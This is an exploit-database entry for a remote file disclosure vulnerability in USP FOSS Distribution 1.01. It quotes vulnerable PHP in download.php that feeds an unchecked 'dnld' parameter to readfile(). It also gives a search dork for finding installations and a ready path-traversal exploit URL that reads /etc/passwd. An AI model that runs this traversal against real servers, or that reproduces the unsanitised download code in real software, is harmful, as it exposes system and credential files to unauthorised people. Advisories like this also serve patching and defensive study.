[ authorization ] [ registration ] [ restore account ]
Contact us
You can contact us by:
0day Today Exploits Market and 0day Exploits Database

USP FOSS Distribution 1.01 (dnld) Remote File Disclosure Vulnerability

Author
GoLd_M
Risk
[
Security Risk Unsored
]
0day-ID
0day-ID-1793
Category
web applications
Date add
23-04-2007
Platform
unsorted
======================================================================
USP FOSS Distribution 1.01 (dnld) Remote File Disclosure Vulnerability
======================================================================



# USP FOSS Distribution 1.01(download.php dnld)Remote File Disclosure
# D.Script: http://norcalvex.org/pagode/uspfoss_v1_01.zip
# Discovered by: GolD_M = [Mahmood_ali]
# Dork:intitle:USP FOSS Distribution
# V.Code In /user/download.php:
###################/user/download.php###################
#  <?
#  $file = @$_GET['dnld'];<----[+]
#  header('Content-Description: File Transfer');
#  header('Content-Type: application/force-download');
#  header('Content-Length: ' . filesize($file));
#  header('Content-Disposition: attachment; filename=' . basename($file));
#  readfile($file); <----[+]
#  ?>
########################################################
# Exploit:[Path_USP FOSS]/user/download.php?dnld=../../../../../../etc/passwd




#  0day.today [2024-12-27]  #